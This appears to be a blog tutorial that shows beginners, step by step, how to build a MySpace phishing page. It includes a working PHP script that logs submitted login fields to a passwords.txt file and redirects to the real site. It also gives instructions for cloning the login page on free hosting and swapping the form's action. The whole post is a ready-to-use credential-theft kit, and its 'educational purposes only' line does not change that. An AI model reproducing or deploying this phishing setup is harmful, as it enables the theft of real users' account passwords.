MySpace Phisher Tutorial (n00b friendly)


Okay I have had so many people tell me they searched for phishers and they all had problems with what to do so I decided to make a VERY clear phishing tutorial on how to make a MySpace phisher step by step.

*note: this tut will be different than most others in explanation but will have a similar result (working phisher).


Step 1. I recommend your first step be creating your hosting site account. To do this simply make an account at a free hosting site (i.e. t35,ripway, etc etc) I will be using ripway . com because I find that they have never deleted any of my accounts and it is user friendly.


Step 2. Okay next you are going to want to open up myspace . com in a new tab and on the homepage (make sure your e-mail isn't saved or it WILL show up in your phisher) and hit CTRL-U. It will open the source code in a new tab. Copy the source code. Go back to your ripway account and hit "create text file" and title it LOGIN.PHP ... next paste the source code from myspace into the text space and hit save.

Step 3. Now hit "create text file" again and title this file phish.php and in the text space insert this:


< ?php
header("Location: http://www.myspace.com");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

and hit save.

Step 4. Now this is the tricky step apparently so read this thoroughly and don't just skim through even though I'm going to make it as simple as possible. Click edit on your LOGIN.php file and hit CTRL F. A search box will appear down by your start button. Copy and paste this into the box:


< form action="https://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm" >


It is the quickest way to get to the log-in section of the MySpace homepage in that big jumble of text!

Step 5. When you have gotten to that part of the text, copy it all and replace it with this:

< form action="phish.php" method="get" id="LoginForm" name="aspnetForm">

Now hit save.

If you have done all of this correctly the best thing to do is to test your completed phisher on yourself.

Click on the file login.php and it should redirect you to your fake myspace log-in page. Enter in anything in the e-mail and password boxes and hit enter. Now return to ripway . com and check your files, a new folder titled passwords.txt should be there and if you hit edit on that file it should have text with whatever you typed into the e-mail and password section.


And BTW this is for educational purposes only and should never be used for illegal purposes!




0 comments:

Post a Comment

Sponsers